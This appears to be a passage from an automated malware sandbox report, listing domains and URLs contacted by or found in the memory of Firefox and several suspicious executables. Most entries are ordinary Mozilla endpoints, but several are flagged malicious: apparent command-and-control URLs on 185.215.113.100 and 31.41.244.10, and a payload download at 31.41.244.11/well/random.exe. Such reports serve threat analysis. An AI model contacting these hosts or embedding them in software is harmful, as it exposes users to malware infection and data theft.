ipv4only.arpa	192.0.0.171	true	false	0%, Virustotal, Browse	unknown
prod.ads.prod.webservices.mozgcp.net	34.117.188.166	true	false	0%, Virustotal, Browse	unknown
push.services.mozilla.com	34.107.243.93	true	false	0%, Virustotal, Browse	unknown
telemetry-incoming.r53-2.services.mozilla.com	34.120.208.123	true	false	0%, Virustotal, Browse	unknown
spocs.getpocket.com	unknown	unknown	false	0%, Virustotal, Browse	unknown
detectportal.firefox.com	unknown	unknown	false	0%, Virustotal, Browse	unknown
bzib.nelreports.net	unknown	unknown	false	0%, Virustotal, Browse	unknown
content-signature-2.cdn.mozilla.net	unknown	unknown	false	0%, Virustotal, Browse	unknown
support.mozilla.org	unknown	unknown	false	0%, Virustotal, Browse	unknown
firefox.settings.services.mozilla.com	unknown	unknown	false	0%, Virustotal, Browse	unknown
shavar.services.mozilla.com	unknown	unknown	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.google.com/favicon.ico	false	Avira URL Cloud: safe	unknown
http://185.215.113.100/e2b1563c6670f193.php	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-	firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1678942	firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://mozilla.org/#/properties/proposedEnrollment	firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://detectportal.firefox.com/	firefox.exe, 00000019.00000003.1734012663.000001EBF2434000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://mozilla.org/#/properties/schemaVersion	firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%	firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value	firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.mozilla.com0	firefox.exe, 00000019.00000003.1924804040.000001EBFDEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1926066661.000001EBFDEAE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1937675261.000001EBFE000000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.25.dr	false	Avira URL Cloud: safe	unknown
https://merino.services.mozilla.com/api/v1/suggest	firefox.exe, 0000001F.00000002.3716622182.000002FB91172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A590000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://mozilla.org/#/properties/originsDaysCutOff	firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://spocs.getpocket.com/spocs	firefox.exe, 00000019.00000003.2076225546.000001EBFDE14000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1885049515.000001EBEEC09000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://screenshots.firefox.com	firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ads.stickyadstv.com/firefox-etp	firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1649737286.000001EBF34C1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://identity.mozilla.com/ids/ecosystem_telemetryU	firefox.exe, 00000019.00000003.2074183845.000001EBFE052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2093698876.000001EBFE072000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://mozilla.org/#/properties/richSuggestionsFeatureGate	firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM	firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://xhr.spec.whatwg.org/#sync-warning	firefox.exe, 00000019.00000003.1651748408.000001EBF4F80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1651748408.000001EBF4FDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1646738732.000001EBF3977000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://mozilla.org/#/properties/branches	firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.amazon.com/exec/obidos/external-search/	firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1562303877.000001EBF1875000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1560793169.000001EBF1600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1946884403.000001EBFE283000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2095774729.000001EBFDC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1562132964.000001EBF1863000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1561053890.000001EBF181A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1561368811.000001EBF1832000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1562472271.000001EBF1887000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mozilla.org/#/properties/userFacingName	firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://profiler.firefox.com/	firefox.exe, 00000019.00000003.1686639668.000001EBEFC74000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mozilla.org/#/properties/cbhStudyRow	firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mozilla-services/screenshots	firefox.exe, 00000019.00000003.1561927088.000001EBF184A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1562303877.000001EBF1875000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1560793169.000001EBF1600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1562132964.000001EBF1863000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1561053890.000001EBF181A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1561368811.000001EBF1832000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def	firefox.exe, 00000019.00000003.1918480363.000001EBFD776000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tracking-protection-issues.herokuapp.com/new	firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mozilla.org/#/properties/referenceBranch	firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK	firefox.exe, 00000019.00000003.2089867380.000001EBFE8D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.100/e2b1563c6670f193.phplS	88b8632b35.exe, 0000001D.00000002.1703865984.0000000001131000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://31.41.244.10/	svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://mozilla.org/#/properties/extraParams	firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mozilla.org/#/properties/branches/anyOf/0http://mozilla.org/#/properties/appId	firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mozilla.org/#/properties/outcomes/items	firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://app.adjust.com/167k4ih?campaign=firefox-desktop&adgroup=pb&creative=focus-omc172&redirect=ht	firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing	firefox.exe, 00000019.00000003.1651748408.000001EBF4F80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1651748408.000001EBF4FDD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.100/al	88b8632b35.exe, 0000001D.00000002.1703865984.00000000010BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://mozilla.org/#/properties/forceWaitHttpsRRaddonsSearchDetection.onSearchEngineModified	firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report	firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mozilla.org/#/properties/outcomes/items/properties/priorityhttp://mozilla.org/#/properties/br	firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ok.ru/	firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.100/e2b1563c6670f193.php7	76251a0626.exe, 00000014.00000002.1561942883.0000000001826000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc	firefox.exe, 00000019.00000003.1646738732.000001EBF3977000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://exslt.org/dates-and-times	firefox.exe, 00000019.00000003.1738162351.000001EBED481000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature	firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://31.41.244.10/Dem7kTu/index.php15e6	svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://www.bbc.co.uk/	firefox.exe, 00000019.00000003.1957522404.000001EBF8FC3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://addons.mozilla.org/firefox/addon/to-google-translate/	firefox.exe, 00000019.00000003.2090847544.000001EBFE00F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2074183845.000001EBFE00F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=	firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A5B7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152	firefox.exe, 00000019.00000003.2014148406.000001EBFD41F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bugzilla.mo	firefox.exe, 00000019.00000003.2074183845.000001EBFE052000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mitmdetection.services.mozilla.com/	firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://spocs.getpocket.com/	firefox.exe, 00000019.00000003.2076225546.000001EBFDE14000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A512000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f	firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.iqiyi.com/	firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1957522404.000001EBF8FC3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/featureI	firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mozilla.org/#/properties/endDate	firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://31.41.244.10/Dem7kTu/index.php15;	svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://monitor.firefox.com/user/breach-stats?includeResolved=true	firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.100/e2b1563c6670f193.phpH4	76251a0626.exe, 00000014.00000002.1561942883.00000000017DE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report	firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1170143	firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mozilla.org/#/properties/networkPredictoraddons-search-detection	firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.bellmedia.c	firefox.exe, 00000019.00000003.1653540755.000001EBF45A2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mozilla.org/#/properties/enrollmentEndDate	firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com	firefox.exe, 00000019.00000003.1653540755.000001EBF45A2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839	firefox.exe, 00000019.00000003.1918480363.000001EBFD770000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.zhihu.com/	firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC1C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC1C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored	firefox.exe, 00000019.00000003.1646738732.000001EBF3977000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mozilla.org/#/properties/outcomes	firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://31.41.244.11/well/random.exe	svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://identity.mozilla.com/apps/relay	firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://31.41.244.10/Dem7kTu/index.php1	svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://mail.yahoo.co.jp/compose/?To=%s	firefox.exe, 00000019.00000003.1882877986.000001EBEFCAE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1568418519.000001EBF1033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684134144.000001EBEFC9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2035398520.000001EBF1035000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.100/en-GB	76251a0626.exe, 00000014.00000002.1561942883.0000000001839000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contile.services.mozilla.com/v1/tiles	firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.co.uk/	firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1957522404.000001EBF8FC3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://31.41.244.10/Dem7kTu/index.php9	svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://monitor.firefox.com/user/preferences	firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://screenshots.firefox.com/	firefox.exe, 00000019.00000003.1561368811.000001EBF1832000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/ad	firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.	firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1736195783.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3716622182.000002FB911C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A5B7000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.25.dr	false	Avira URL Cloud: safe	unknown
https://vk.com/	firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.olx.pl/	firefox.exe, 00000019.00000003.1735294322.000001EBEEC1C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC1C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://31.41.244.10/Dem7kTu/index.phpF	svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://mozilla.org/#/properties/branches/anyOf/0/items/properties/ratio	firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://addons.mozilla.org/user-media/addon_icons/784/784287-64.png?modified=mcrushed(browserSetting	firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4	firefox.exe, 00000019.00000003.1646738732.000001EBF3977000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2	firefox.exe, 00000019.00000003.1646738732.000001EBF3977000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://watch.sling.com/	firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://31.41.244.10/Dem7kTu/index.phpY	svoutse.exe, 0000000F.00000002.3716587854.00000000010AD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureElementReleaseCaptureWarningElem	firefox.exe, 00000019.00000003.1651748408.000001EBF4FAA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://webextensions.settings.services.mozilla.com/v1	firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts	firefox.exe, 00000019.00000003.2008800285.000001EBF92D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2015701743.000001EBF92D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1955684141.000001EBF92D5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://31.41.244.10/Dem7kTu/index.phpe	svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta	firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1736195783.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3716622182.000002FB911C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A5B7000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.25.dr	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0	firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1736195783.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3716622182.000002FB911C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A5B7000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.25.dr	false	Avira URL Cloud: safe	unknown
